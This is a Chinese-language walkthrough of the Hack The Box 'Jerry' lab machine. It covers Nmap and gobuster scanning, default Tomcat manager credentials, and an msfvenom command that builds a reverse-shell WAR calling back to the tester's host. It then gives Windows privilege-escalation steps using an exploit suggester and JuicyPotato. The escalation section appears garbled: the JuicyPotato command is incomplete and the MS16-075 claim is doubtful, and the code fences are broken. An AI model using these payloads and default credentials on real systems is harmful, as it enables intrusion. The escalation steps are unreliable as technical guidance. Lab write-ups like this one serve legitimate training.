HTB的Jerry渗透测试是什么

# HTB的Jerry渗透测试是什么

## 引言
Hack The Box（HTB）是一个广受欢迎的在线渗透测试平台，Jerry是其入门级Windows靶机之一。本文将从环境配置、渗透流程、漏洞利用到权限提升，详细解析Jerry靶机的完整渗透过程，帮助初学者理解基础渗透测试方法论。

---

## 一、HTB平台与Jerry靶机概述

### 1.1 HTB平台特点
- **实战化学习环境**：提供模拟真实漏洞的虚拟靶机
- **难度分级系统**：从Beginner到Insane的六级难度体系
- **社区协作机制**：支持用户交流解题思路（论坛/Discord）

### 1.2 Jerry靶机基础信息
| 属性 | 详情 |
|-------|------|
| 难度评级 | Easy |
| 操作系统 | Windows Server 2012 |
| 暴露服务 | Apache Tomcat 8.5.14 |
| 核心漏洞 | 默认凭证部署漏洞 |

---

## 二、渗透测试环境准备

### 2.1 必要工具清单
- **网络扫描**：Nmap
- **漏洞利用**：Metasploit Framework
- **Web分析**：Burp Suite
- **密码破解**：John the Ripper

### 2.2 VPN连接配置
```bash
sudo openvpn your-lab-connection.ovpn
ping <Jerry_IP> # 测试连通性

---

三、信息收集阶段

3.1 端口扫描（Nmap）

nmap -sV -Pn -T4 <target_IP>

扫描结果分析：

8080/tcp open http Apache Tomcat 8.5.14

3.2 Web服务探测

1. 访问http://<IP>:8080发现Tomcat管理页面
2. 使用DirBuster扫描目录：

gobuster dir -u http://<IP>:8080 -w /usr/share/wordlists/dirb/common.txt

---

四、漏洞利用过程

4.1 发现默认凭证

通过Tomcat文档发现常见默认凭证：

admin:admin
tomcat:s3cret

4.2 登录Manager App

1. 使用tomcat:s3cret成功登录/manager/html
2. 在部署界面发现WAR文件上传功能

4.3 部署恶意WAR

1. 使用msfvenom生成后门：

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your_IP> LPORT=4444 -f war > shell.war

1. 上传并访问/shell触发连接

---

五、权限提升与后渗透

5.1 初始立足点

获取的Tomcat服务账户权限有限，需进行提权：

whoami /all # 显示当前权限
systeminfo # 收集系统信息

5.2 利用Windows内核漏洞

1. 使用Windows-Exploit-Suggester检测漏洞：

python windows-exploit-suggester.py --database 2023-04-20-mssb.xls --systeminfo systeminfo.txt

1. 发现MS16-075（烂土豆提权）适用

5.3 获取SYSTEM权限

1. 上传JuicyPotato.exe到靶机
2. 执行提权命令：

JuicyPotato.exe -t * -p C:\Windows\System32\cmd.exe -l 1337

---

六、Jerry靶机渗透要点总结

6.1 关键漏洞链

1. 服务暴露：Tomcat管理界面对外开放
2. 弱凭证漏洞：未修改默认密码
3. 权限配置不当：允许任意WAR部署

6.2 防御建议

• 修改所有默认凭证
• 限制管理界面访问IP
• 定期更新中间件版本

---

七、学习价值与延伸思考

7.1 技术收获

• 理解中间件管理接口的安全风险
• 掌握基础的Windows提权方法
• 学习渗透测试的标准流程（枚举→利用→提权）

7.2 扩展挑战

• 尝试不使用Metasploit完成渗透
• 研究Tomcat的其他攻击面（如CVE-2020-1938）
• 在HTB平台尝试其他Windows靶机（如Legacy, Blue）

---

参考资料

1. HTB官方Jerry靶机文档
2. OWASP Tomcat安全配置指南
3. MITRE ATT&CK框架TA0002/TA0004

”`

注：实际测试时请确保获得合法授权，本文仅用于教育目的。完整渗透过程视频可在HTB官方YouTube频道找到演示。